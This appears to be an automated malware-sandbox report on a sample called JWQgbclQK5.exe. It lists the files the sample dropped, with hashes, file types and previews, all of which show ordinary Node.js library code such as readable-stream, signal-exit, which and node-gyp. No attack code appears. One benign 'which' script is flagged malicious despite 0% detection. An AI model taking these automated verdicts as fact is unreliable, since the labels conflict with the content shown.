              Preview:// Copyright Joyent, Inc. and other Node contributors..//.// Permission is hereby granted, free of charge, to any person obtaining a.// copy of this software and associated documentation files (the.// "Software"), to deal in the Software without restriction, including.// without limitation the rights to use, copy, modify, merge, publish,.// distribute, sublicense, and/or sell copies of the Software, and to permit.// persons to whom the Software is furnished to do so, subject to the.// following conditions:.//.// The above copyright notice and this permission notice shall be included.// in all copies or substantial portions of the Software..//.// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS.// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN.// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,.// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONT
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):21907
              Entropy (8bit):4.936189601157493
              Encrypted:false
              SSDEEP:
              MD5:1997E9040E13749540039901789AFAC1
              SHA1:2EA69C1E8E0C9FD0FB25A8E5ED398BD3803CCB7A
              SHA-256:0F3F2ACCECD343DFAE91D7DAA72F3AD125B6F139D5883FF51362042D8CB65CF6
              SHA-512:74C072D3160A8F0BE3AC6434087C1FAF7ADEF7271B1355E79FA2535E8B3FFEDE9B57415C3F295ED8F21532AA4BE50BEA668F0FD79572C1726B8C3D0FD5B42016
              Malicious:false
              Reputation:unknown
              Preview:// Copyright Joyent, Inc. and other Node contributors..//.// Permission is hereby granted, free of charge, to any person obtaining a.// copy of this software and associated documentation files (the.// "Software"), to deal in the Software without restriction, including.// without limitation the rights to use, copy, modify, merge, publish,.// distribute, sublicense, and/or sell copies of the Software, and to permit.// persons to whom the Software is furnished to do so, subject to the.// following conditions:.//.// The above copyright notice and this permission notice shall be included.// in all copies or substantial portions of the Software..//.// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS.// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN.// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,.// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONT
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Algol 68 source, ASCII text, with very long lines (377)
              Category:dropped
              Size (bytes):6468
              Entropy (8bit):4.717525547750977
              Encrypted:false
              SSDEEP:
              MD5:DA1DF0ED0E055BD4D0867CB4109C8C65
              SHA1:722F1AECD505D1DBD2C790855AA5442073EBD637
              SHA-256:56A7DDE0D36EE9F55032DF01E78229602C6AFED6B6915362F33DC65BC0359972
              SHA-512:424F58A4F470D9844BDB5E116C88B780D6908370EC87A0920FDFCF08D369D112F7A6022DE43FD52C138751217323F343A0ACEE36C61D395FC1DD685482750495
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..var _Object$setPrototypeO;.function _defineProperty(obj, key, value) { key = _toPropertyKey(key); if (key in obj) { Object.defineProperty(obj, key, { value: value, enumerable: true, configurable: true, writable: true }); } else { obj[key] = value; } return obj; }.function _toPropertyKey(arg) { var key = _toPrimitive(arg, "string"); return typeof key === "symbol" ? key : String(key); }.function _toPrimitive(input, hint) { if (typeof input !== "object" || input === null) return input; var prim = input[Symbol.toPrimitive]; if (prim !== undefined) { var res = prim.call(input, hint || "default"); if (typeof res !== "object") return res; throw new TypeError("@@toPrimitive must return a primitive value."); } return (hint === "string" ? String : Number)(input); }.var finished = require('./end-of-stream');.var kLastResolve = Symbol('lastResolve');.var kLastReject = Symbol('lastReject');.var kError = Symbol('error');.var kEnded = Symbol('ended');.var kLastPromise = Symbol('lastPro
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Algol 68 source, ASCII text, with very long lines (506)
              Category:dropped
              Size (bytes):6905
              Entropy (8bit):4.64792784624243
              Encrypted:false
              SSDEEP:
              MD5:5941A6C05D57BCF11A8A2E5ED7ED5583
              SHA1:63024CA878BB415B3C33254A22AFF1CB08D96063
              SHA-256:15B266DB6AD5C6EE0309D13ED4CE137D8974D2FD236C1AF7F3D602B7028A90DF
              SHA-512:BB686B29C52C02F4AAD72337AE6DB160087EC11626C38B98B1A7D6E6131B96856CBFE3829E236F8E93F8CD648D70681DF60A1165771B9748F4FC4CD34B46D2AB
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..function ownKeys(object, enumerableOnly) { var keys = Object.keys(object); if (Object.getOwnPropertySymbols) { var symbols = Object.getOwnPropertySymbols(object); enumerableOnly && (symbols = symbols.filter(function (sym) { return Object.getOwnPropertyDescriptor(object, sym).enumerable; })), keys.push.apply(keys, symbols); } return keys; }.function _objectSpread(target) { for (var i = 1; i < arguments.length; i++) { var source = null != arguments[i] ? arguments[i] : {}; i % 2 ? ownKeys(Object(source), !0).forEach(function (key) { _defineProperty(target, key, source[key]); }) : Object.getOwnPropertyDescriptors ? Object.defineProperties(target, Object.getOwnPropertyDescriptors(source)) : ownKeys(Object(source)).forEach(function (key) { Object.defineProperty(target, key, Object.getOwnPropertyDescriptor(source, key)); }); } return target; }.function _defineProperty(obj, key, value) { key = _toPropertyKey(key); if (key in obj) { Object.defineProperty(obj, key, { value: value,
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3109
              Entropy (8bit):4.623020246068149
              Encrypted:false
              SSDEEP:
              MD5:911F1B0A9DA5646F070719A4B5155ED4
              SHA1:4360512D8CCDDC09D6A2AF937C24D3293AF7D928
              SHA-256:E1C1A185A2CC4BEE2BE5E7D33B5E294EB0FB55C1A47B61853A8C43E50CB822A4
              SHA-512:1414A8362C638244F3049055C7807DC0F452025C3D7329131C0506D84A6D35135E847EDE2D72816D082090D505A7C855E1F56BC8123E1E7ED739C5A4E0577DB1
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..// undocumented cb() API, needed for core, not for public API.function destroy(err, cb) {. var _this = this;. var readableDestroyed = this._readableState && this._readableState.destroyed;. var writableDestroyed = this._writableState && this._writableState.destroyed;. if (readableDestroyed || writableDestroyed) {. if (cb) {. cb(err);. } else if (err) {. if (!this._writableState) {. process.nextTick(emitErrorNT, this, err);. } else if (!this._writableState.errorEmitted) {. this._writableState.errorEmitted = true;. process.nextTick(emitErrorNT, this, err);. }. }. return this;. }.. // we set destroyed to true before firing error callbacks in order. // to make it re-entrance safe in case destroy() is called within callbacks.. if (this._readableState) {. this._readableState.destroyed = true;. }.. // if this is a duplex stream mark the writable part as destroyed as well. if (this._writableState) {. this._writ
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3084
              Entropy (8bit):4.840039742977667
              Encrypted:false
              SSDEEP:
              MD5:E1CDAD2418FE697448B02EBBCD9CF684
              SHA1:5331E3E33C1C4F6113E2EE195606057985365B3B
              SHA-256:2C35CABC9B279CB81E73D0D14859B2056EA10D9688D16A12199D2CA9904B93AE
              SHA-512:63630CF251F4F3543E86296CEFF044A960F8D37AC0592F0E06121F913494296748CBA35E36A11D8F5968536A7E7CD7E0F13837E39A4839050D1F2DF6D60388E4
              Malicious:false
              Reputation:unknown
              Preview:// Ported from https://github.com/mafintosh/end-of-stream with.// permission from the author, Mathias Buus (@mafintosh)...'use strict';..var ERR_STREAM_PREMATURE_CLOSE = require('../../../errors').codes.ERR_STREAM_PREMATURE_CLOSE;.function once(callback) {. var called = false;. return function () {. if (called) return;. called = true;. for (var _len = arguments.length, args = new Array(_len), _key = 0; _key < _len; _key++) {. args[_key] = arguments[_key];. }. callback.apply(this, args);. };.}.function noop() {}.function isRequest(stream) {. return stream.setHeader && typeof stream.abort === 'function';.}.function eos(stream, opts, callback) {. if (typeof opts === 'function') return eos(stream, null, opts);. if (!opts) opts = {};. callback = once(callback || noop);. var readable = opts.readable || opts.readable !== false && stream.readable;. var writable = opts.writable || opts.writable !== false && stream.writable;. var onlegacyfinish = function onlegacyfi
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):101
              Entropy (8bit):4.547801182348123
              Encrypted:false
              SSDEEP:
              MD5:2AC62AF594DA915C368DD629992C488F
              SHA1:2BEA06BCBC5B65C53A72BB45D254EDCAF19D15BB
              SHA-256:4B4404C7BD6F66A2175CB7A29C60CE4395C055775EC45EAA35AF4357656F604F
              SHA-512:12F7B9A13387540EE91FEE1E0E2608511A95D072EE7D072E635B5CCB6231E27E60E199589F02FFA49C1E654C49535FCBC93F17D305271768CC0FE2C1715C0A11
              Malicious:false
              Reputation:unknown
              Preview:module.exports = function () {. throw new Error('Readable.from is not available in the browser').};.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Algol 68 source, ASCII text, with very long lines (506)
              Category:dropped
              Size (bytes):3668
              Entropy (8bit):4.916287428551754
              Encrypted:false
              SSDEEP:
              MD5:4C81629D079DA2D4B4D15F3D62DF7CE8
              SHA1:BE965CAF7212B5951CD7D6478E9C9EDA9235DBF0
              SHA-256:B7B5815F476B47A23D094ECFA4F1C53BECA69D4F5A42ED452D133B79A1BF28AE
              SHA-512:33E19535CDC017D74E704EA09B40040025A389AC5F173FEBD101A30B885429B63EF9D7F5985F26A580BAA558F09E81C5D506F4F7D875FD9E8B12BA7E1509F122
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..function asyncGeneratorStep(gen, resolve, reject, _next, _throw, key, arg) { try { var info = gen[key](arg); var value = info.value; } catch (error) { reject(error); return; } if (info.done) { resolve(value); } else { Promise.resolve(value).then(_next, _throw); } }.function _asyncToGenerator(fn) { return function () { var self = this, args = arguments; return new Promise(function (resolve, reject) { var gen = fn.apply(self, args); function _next(value) { asyncGeneratorStep(gen, resolve, reject, _next, _throw, "next", value); } function _throw(err) { asyncGeneratorStep(gen, resolve, reject, _next, _throw, "throw", err); } _next(undefined); }); }; }.function ownKeys(object, enumerableOnly) { var keys = Object.keys(object); if (Object.getOwnPropertySymbols) { var symbols = Object.getOwnPropertySymbols(object); enumerableOnly && (symbols = symbols.filter(function (sym) { return Object.getOwnPropertyDescriptor(object, sym).enumerable; })), keys.push.apply(keys, symbols); } re
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2416
              Entropy (8bit):4.89234390345398
              Encrypted:false
              SSDEEP:
              MD5:95708E1741D7CE72561DDCA9BF6FFFE3
              SHA1:EB07BC48F37C4AE097677C91AE592430D7518507
              SHA-256:6D51B72E1AE5EE0965F0F549E27ECECDB4963605995FFAD8B698D5359A9999C2
              SHA-512:1A09035F671703ADCD2E5728378FCB0D6C2CAB54597E433C9AAEF0D0CBD52917B5FF644DA8AD94C38B3CACD38EF62CF0EC2A0EA84FF570C273A613168A89C4FE
              Malicious:false
              Reputation:unknown
              Preview:// Ported from https://github.com/mafintosh/pump with.// permission from the author, Mathias Buus (@mafintosh)...'use strict';..var eos;.function once(callback) {. var called = false;. return function () {. if (called) return;. called = true;. callback.apply(void 0, arguments);. };.}.var _require$codes = require('../../../errors').codes,. ERR_MISSING_ARGS = _require$codes.ERR_MISSING_ARGS,. ERR_STREAM_DESTROYED = _require$codes.ERR_STREAM_DESTROYED;.function noop(err) {. // Rethrow the error if it exists to avoid swallowing it. if (err) throw err;.}.function isRequest(stream) {. return stream.setHeader && typeof stream.abort === 'function';.}.function destroyer(stream, reading, writing, callback) {. callback = once(callback);. var closed = false;. stream.on('close', function () {. closed = true;. });. if (eos === undefined) eos = require('./end-of-stream');. eos(stream, {. readable: reading,. writable: writing. }, function (err) {. if (err) return ca
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):745
              Entropy (8bit):5.298057797853489
              Encrypted:false
              SSDEEP:
              MD5:0306DF5E76CAD892F09D4C46FDE02529
              SHA1:10FDFEB79C0A4CD671B562744BE948F789BC4D5E
              SHA-256:BF9C5CE1CCDE2131D474422BEF258DC968D6D19CCAC72F9B178E8246FAF0C9ED
              SHA-512:4A69284449BE01D0D2B7B0118694E6B3190539FC533FF3BCA5D6205E22E4683C0FC98796CF75A38B16C2B13DF01F61BA7FEFE7A8639B39B2186ED621554617EF
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..var ERR_INVALID_OPT_VALUE = require('../../../errors').codes.ERR_INVALID_OPT_VALUE;.function highWaterMarkFrom(options, isDuplex, duplexKey) {. return options.highWaterMark != null ? options.highWaterMark : isDuplex ? options[duplexKey] : null;.}.function getHighWaterMark(state, options, duplexKey, isDuplex) {. var hwm = highWaterMarkFrom(options, isDuplex, duplexKey);. if (hwm != null) {. if (!(isFinite(hwm) && Math.floor(hwm) === hwm) || hwm < 0) {. var name = isDuplex ? duplexKey : 'highWaterMark';. throw new ERR_INVALID_OPT_VALUE(name, hwm);. }. return Math.floor(hwm);. }.. // Default value. return state.objectMode ? 16 : 16 * 1024;.}.module.exports = {. getHighWaterMark: getHighWaterMark.};
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):49
              Entropy (8bit):4.275737589534865
              Encrypted:false
              SSDEEP:
              MD5:DF20453C19AF8406BABDF987FACD76D9
              SHA1:0167A0DC72DAAB83989846563AAE870F37549151
              SHA-256:72D46A15491627D8FB1489A47D03583CFE5C21902918016AB532B53E615E5A9A
              SHA-512:8004ACA5EFC10CF89BF41ECBB6586F9ACD707EF3B789CC714043C48C0D47B6479D9D2C2FD9894AEDC683EDCB88FAD8B28517D329417D6E2D0E2B639D964956D9
              Malicious:false
              Reputation:unknown
              Preview:module.exports = require('events').EventEmitter;.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):36
              Entropy (8bit):4.2363238771524
              Encrypted:false
              SSDEEP:
              MD5:76BAE0AACA4D9C61A71995751B67448B
              SHA1:90B89EC87417D1301E7615A3BA50B04626C2796C
              SHA-256:1E7903927DF33AADB3659ECCE55266C9C851DA65CE6C8B723A60A305C1C5422C
              SHA-512:9BE70625AF9C47A3772622031CDC4ADA6E009D9DDF71F7409109EF6B6ADFB444414630897EAB07F77BD268F66C9462D199CB72934E0BB4FDBBE614F16BB3DE24
              Malicious:false
              Reputation:unknown
              Preview:module.exports = require('stream');.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1886
              Entropy (8bit):4.693861640444865
              Encrypted:false
              SSDEEP:
              MD5:9C2127BF7F0075C3BF99EDB27A77034C
              SHA1:6BC59E2D7A44059A5F86B25E3E8EF9B80A83FCAC
              SHA-256:469EA81F64037D1F179BCD46412217903A2924DD2E7D7D9B728659B6F12C3E69
              SHA-512:D00872EC72A9D21517524C1B20E4B224070AE811532175C3766A0178717CD5A8886EB930C5A8A0BA94FB96B319112479F5364F46708DA66B2E819E691A890308
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "readable-stream",. "version": "3.6.2",. "description": "Streams3, a user-land copy of the stream library from Node.js",. "main": "readable.js",. "engines": {. "node": ">= 6". },. "dependencies": {. "inherits": "^2.0.3",. "string_decoder": "^1.1.1",. "util-deprecate": "^1.0.1". },. "devDependencies": {. "@babel/cli": "^7.2.0",. "@babel/core": "^7.2.0",. "@babel/polyfill": "^7.0.0",. "@babel/preset-env": "^7.2.0",. "airtap": "0.0.9",. "assert": "^1.4.0",. "bl": "^2.0.0",. "deep-strict-equal": "^0.2.0",. "events.once": "^2.0.2",. "glob": "^7.1.2",. "gunzip-maybe": "^1.4.1",. "hyperquest": "^2.1.3",. "lolex": "^2.6.0",. "nyc": "^11.0.0",. "pump": "^3.0.0",. "rimraf": "^2.6.2",. "tap": "^12.0.0",. "tape": "^4.9.0",. "tar-fs": "^1.16.2",. "util-promisify": "^2.1.0". },. "scripts": {. "test": "tap -J --no-esm test/parallel/*.js test/ours/*.js",. "ci": "TAP=1 tap --no-esm test/parallel/*.js tes
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):488
              Entropy (8bit):4.687312265109567
              Encrypted:false
              SSDEEP:
              MD5:EA67EDA027D1F8AA5078ACDFF67D3348
              SHA1:696DD57F91137E8EFE4CB6448FCF63F48B33C4D9
              SHA-256:C4FF3EA62EF65A2C68EA721DCBD58B621150660FACD02BE95EBFC556C4DD123F
              SHA-512:53306F43FB3CBCF6F96783D89A20A40EB18391B299ED7060274A4E75D830519FC30EFB34CD3E8EF8F37E910E469AEC8760C1EDEC4D37F20E07C6F6414D0027B8
              Malicious:false
              Reputation:unknown
              Preview:exports = module.exports = require('./lib/_stream_readable.js');.exports.Stream = exports;.exports.Readable = exports;.exports.Writable = require('./lib/_stream_writable.js');.exports.Duplex = require('./lib/_stream_duplex.js');.exports.Transform = require('./lib/_stream_transform.js');.exports.PassThrough = require('./lib/_stream_passthrough.js');.exports.finished = require('./lib/internal/streams/end-of-stream.js');.exports.pipeline = require('./lib/internal/streams/pipeline.js');.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):729
              Entropy (8bit):4.842123552696689
              Encrypted:false
              SSDEEP:
              MD5:F78AB238BE23D4747A8BB44E35B6BC81
              SHA1:857455F43161C4C63B67A42DE981EF947385303C
              SHA-256:2944F1D3C8C5D5C5E07E7C30D6CBEF5FC37440B7C73DE47AEB37FA8424F04BF1
              SHA-512:B1413C818A305FFB1A4D249ECEC9D011A1FD99AC43D6BFD05C4320251494272BBCF2BCC849E6A5C3C31ADB725345556D3180A117D32011760981E267427C0AB5
              Malicious:false
              Reputation:unknown
              Preview:var Stream = require('stream');.if (process.env.READABLE_STREAM === 'disable' && Stream) {. module.exports = Stream.Readable;. Object.assign(module.exports, Stream);. module.exports.Stream = Stream;.} else {. exports = module.exports = require('./lib/_stream_readable.js');. exports.Stream = Stream || exports;. exports.Readable = exports;. exports.Writable = require('./lib/_stream_writable.js');. exports.Duplex = require('./lib/_stream_duplex.js');. exports.Transform = require('./lib/_stream_transform.js');. exports.PassThrough = require('./lib/_stream_passthrough.js');. exports.finished = require('./lib/internal/streams/end-of-stream.js');. exports.pipeline = require('./lib/internal/streams/pipeline.js');.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):748
              Entropy (8bit):5.012080016295658
              Encrypted:false
              SSDEEP:
              MD5:E29E20260A1C78DBA16A233048565CDE
              SHA1:FFFFDA22E521943BC894935CFAE5DD16AAF35897
              SHA-256:E05B1EAF5B5F99B7AD75CD1F38858FF9A311780B97715EAD67936D60BF96AA7E
              SHA-512:E43319AE4E5F0467849E3FECEE1480F484ACB60E6D407D8B249D8C225426E62AC4FC6AC948673B9EEC3308D18D89B99C43F8420136520D8F6C8DD7B87B7F4450
              Malicious:false
              Reputation:unknown
              Preview:The ISC License..Copyright (c) 2015, Contributors..Permission to use, copy, modify, and/or distribute this software.for any purpose with or without fee is hereby granted, provided.that the above copyright notice and this permission notice.appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES.WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES.OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE.LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES.OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,.WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION,.ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):5708
              Entropy (8bit):4.559320438441376
              Encrypted:false
              SSDEEP:
              MD5:29D83BA58D5BAE885CDD0F9A3300B54C
              SHA1:01DD760BF2A5E45361536C8C46AA0E2EF5199722
              SHA-256:7CC6F6A1E14DEC79DC23F6AFD7CACA1319189747144E1A33AF77616C21D9E9DE
              SHA-512:2F4D49677F4C7815F46B483A82105FADC832568B7A8FB28EB4E7F82F7046BD4698227F09888B25C9B62F9AA8C3421042D939DD12D70778AF7A3DA212EEDABB1C
              Malicious:false
              Reputation:unknown
              Preview:// Note: since nyc uses this module to output coverage, any lines.// that are in the direct sync flow of nyc's outputCoverage are.// ignored, since we can never get coverage for them..// grab a reference to node's real process object right away.var process = global.process..const processOk = function (process) {. return process &&. typeof process === 'object' &&. typeof process.removeListener === 'function' &&. typeof process.emit === 'function' &&. typeof process.reallyExit === 'function' &&. typeof process.listeners === 'function' &&. typeof process.kill === 'function' &&. typeof process.pid === 'number' &&. typeof process.on === 'function'.}..// some kind of non-node environment, just no-op./* istanbul ignore if */.if (!processOk(process)) {. module.exports = function () {. return function () {}. }.} else {. var assert = require('assert'). var signals = require('./signals.js'). var isWin = /^win/i.test(process.platform).. var EE = require('events').
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):864
              Entropy (8bit):4.64157938598598
              Encrypted:false
              SSDEEP:
              MD5:10E35CB03A75943F36DE8A88CD1B3767
              SHA1:69859FFCD06C12C103DE10319BD03A2B5CBCB903
              SHA-256:CEC1BBA4C97E0CF653C13C8C79F745AAC2232131EE718C93C4236C1B9577A201
              SHA-512:59A0346C538E8E2984DEAD5196DE0462766DC9018CBD8A0FC89EA6318C8CFA2D200E8C2F7DB62BB09A7D722011D27D3FD80C73F89D37A693D5742AD5023FB1DA
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "signal-exit",. "version": "3.0.7",. "description": "when you want to fire an event no matter how a process exits.",. "main": "index.js",. "scripts": {. "test": "tap",. "snap": "tap",. "preversion": "npm test",. "postversion": "npm publish",. "prepublishOnly": "git push origin --follow-tags". },. "files": [. "index.js",. "signals.js". ],. "repository": {. "type": "git",. "url": "https://github.com/tapjs/signal-exit.git". },. "keywords": [. "signal",. "exit". ],. "author": "Ben Coe <ben@npmjs.com>",. "license": "ISC",. "bugs": {. "url": "https://github.com/tapjs/signal-exit/issues". },. "homepage": "https://github.com/tapjs/signal-exit",. "devDependencies": {. "chai": "^3.5.0",. "coveralls": "^3.1.1",. "nyc": "^15.1.0",. "standard-version": "^9.3.1",. "tap": "^15.1.1". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1295
              Entropy (8bit):4.937872397568171
              Encrypted:false
              SSDEEP:
              MD5:088797B13DCE89E566484933FE8538B7
              SHA1:6E1C2FF72044C1901590FFD119245461FB85A6BC
              SHA-256:AE538FDAE683D6FA2E14579DA06DF10FB7A66378CFA50971956FB68C2C86C727
              SHA-512:81E85ED95A39A5F4ECE3895E99373ED01ACE48507A707F99953AB922988F0B068731E16CFD5D993B670E0F21A17AD1BD0CEF3F96DA74CAB4AE3B27A0D6FB50F1
              Malicious:false
              Reputation:unknown
              Preview:// This is not the set of all possible signals..//.// It IS, however, the set of all signals that trigger.// an exit on either Linux or BSD systems. Linux is a.// superset of the signal names supported on BSD, and.// the unknown signals just fail to register, so we can.// catch that easily enough..//.// Don't bother with SIGKILL. It's uncatchable, which.// means that we can't fire any callbacks anyway..//.// If a user does happen to register a handler on a non-.// fatal signal like SIGWINCH or something, and then.// exit, it'll end up firing `process.emit('exit')`, so.// the handler will be fired anyway..//.// SIGBUS, SIGFPE, SIGSEGV and SIGILL, when not raised.// artificially, inherently leave the process in a.// state from which it is not safe to try and enter JS.// listeners..module.exports = [. 'SIGABRT',. 'SIGALRM',. 'SIGHUP',. 'SIGINT',. 'SIGTERM'.]..if (process.platform !== 'win32') {. module.exports.push(. 'SIGVTALRM',. 'SIGXCPU',. 'SIGXFSZ',. 'SIGUSR2',.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:a /usr/bin/env node script, ASCII text executable
              Category:dropped
              Size (bytes):985
              Entropy (8bit):4.508094694583337
              Encrypted:false
              SSDEEP:
              MD5:AB7317A95D1F704CB183D7C438A3E890
              SHA1:5B6B3E1838316FB3F1B3B4194CDF49DB0674EB17
              SHA-256:055F0AC4EED1A1591D033D59462972968BF3483B4CC07E163589569C0FB999F0
              SHA-512:322A3FDCBDC0AB2240ACDA547ABE636D51F7F2114200491F7FC66C4353D43D37A4052DF0D32F29EDE80C8A768D312EFAE8ED28639F55C2E5A678F306A45986F9
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:#!/usr/bin/env node.var which = require("../").if (process.argv.length < 3). usage()..function usage () {. console.error('usage: which [-as] program ...'). process.exit(1).}..var all = false.var silent = false.var dashdash = false.var args = process.argv.slice(2).filter(function (arg) {. if (dashdash || !/^-/.test(arg)). return true.. if (arg === '--') {. dashdash = true. return false. }.. var flags = arg.substr(1).split(''). for (var f = 0; f < flags.length; f++) {. var flag = flags[f]. switch (flag) {. case 's':. silent = true. break. case 'a':. all = true. break. default:. console.error('which: illegal option -- ' + flag). usage(). }. }. return false.})..process.exit(args.reduce(function (pv, current) {. try {. var f = which.sync(current, { all: all }). if (all). f = f.join('\n'). if (!silent). console.log(f). return pv;. } catch (e) {. return 1;. }.}, 0)).
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3163
              Entropy (8bit):4.831420316760103
              Encrypted:false
              SSDEEP:
              MD5:2F112AC3FED09F7BC11E3F78C096E435
              SHA1:CFB29894630A310FF6D56C91EE327A076CED7179
              SHA-256:76845E1FE7851267FB7EE72B18F2D916996D330150E31E48F4657A79E9B46B5B
              SHA-512:6E5617FF8DCDACDB444A61FB55AAE7D19DD6ADDD175DC299BD20E8A6E1BF13EE105F53DAC49033D0775561714B0093A88ECD9E865BDB8DDD7BB7BBE9EF990214
              Malicious:false
              Reputation:unknown
              Preview:const isWindows = process.platform === 'win32' ||. process.env.OSTYPE === 'cygwin' ||. process.env.OSTYPE === 'msys'..const path = require('path').const COLON = isWindows ? ';' : ':'.const isexe = require('isexe')..const getNotFoundError = (cmd) =>. Object.assign(new Error(`not found: ${cmd}`), { code: 'ENOENT' })..const getPathInfo = (cmd, opt) => {. const colon = opt.colon || COLON.. // If it has a slash, then we don't bother searching the pathenv.. // just check the file itself, and that's it.. const pathEnv = cmd.match(/\//) || isWindows && cmd.match(/\\/) ? ['']. : (. [. // windows always checks the cwd first. ...(isWindows ? [process.cwd()] : []),. ...(opt.path || process.env.PATH ||. /* istanbul ignore next: very unusual */ '').split(colon),. ]. ). const pathExtExe = isWindows. ? opt.pathExt || process.env.PATHEXT || '.EXE;.CMD;.BAT;.COM'. : ''. const pathExt = isWindows ? pathExtExe.split(colon) : [''].. if (isWi
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1200
              Entropy (8bit):4.773881753744895
              Encrypted:false
              SSDEEP:
              MD5:B542FE562004924FD7BF57297AECBE50
              SHA1:BA9D4351E8AEC98ECD1ECB619614B6B91F7B71D0
              SHA-256:B71E2EBEF72BE81C16438A7DE52ED3333557B754686516FB4334B83B15495AAB
              SHA-512:6EBC1E04CD39E8443E681A4A39EE7AC930DF97FEBC2CBF98B44A0E270587889CD8EC6B0C944B84DDBF9620229C982BF91658674782D9BDBEAA908996A1278E59
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "node-gyp",. "description": "Node.js native addon build tool",. "license": "MIT",. "keywords": [. "native",. "addon",. "module",. "c",. "c++",. "bindings",. "gyp". ],. "version": "9.4.0",. "installVersion": 11,. "author": "Nathan Rajlich <nathan@tootallnate.net> (http://tootallnate.net)",. "repository": {. "type": "git",. "url": "git://github.com/nodejs/node-gyp.git". },. "preferGlobal": true,. "bin": "./bin/node-gyp.js",. "main": "./lib/node-gyp.js",. "dependencies": {. "env-paths": "^2.2.0",. "exponential-backoff": "^3.1.1",. "glob": "^7.1.4",. "graceful-fs": "^4.2.6",. "make-fetch-happen": "^11.0.3",. "nopt": "^6.0.0",. "npmlog": "^6.0.0",. "rimraf": "^3.0.2",. "semver": "^7.3.5",. "tar": "^6.1.2",. "which": "^2.0.2". },. "engines": {. "node": "^12.13 || ^14.13 || >=16". },. "devDependencies": {. "bindings": "^1.5.0",. "mocha": "^10.2.0",. "nan": "^2.14.2",. "require-inject": "^1.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C source, ASCII text
              Category:dropped
              Size (bytes):872
              Entropy (8bit):5.151421579443292
              Encrypted:false
              SSDEEP:
              MD5:2F5039F0BD7A58464199B383574F8ACF
              SHA1:E85697DD047DDDD3B3151373F48FAA4F85E473D4
              SHA-256:292DDAA0D873F51078617E3C3C8A9DB3FF4D262BE68BE1426886FAAC80D3B093
              SHA-512:1A414CAA32022420BC17255AC677043662F01BD92329D9F7DFF55D415497D16909053B75F4189690B5845AB052F78CC77C2A4DB4C76A33CF55340B7C2D7E4D8F
              Malicious:false
              Reputation:unknown
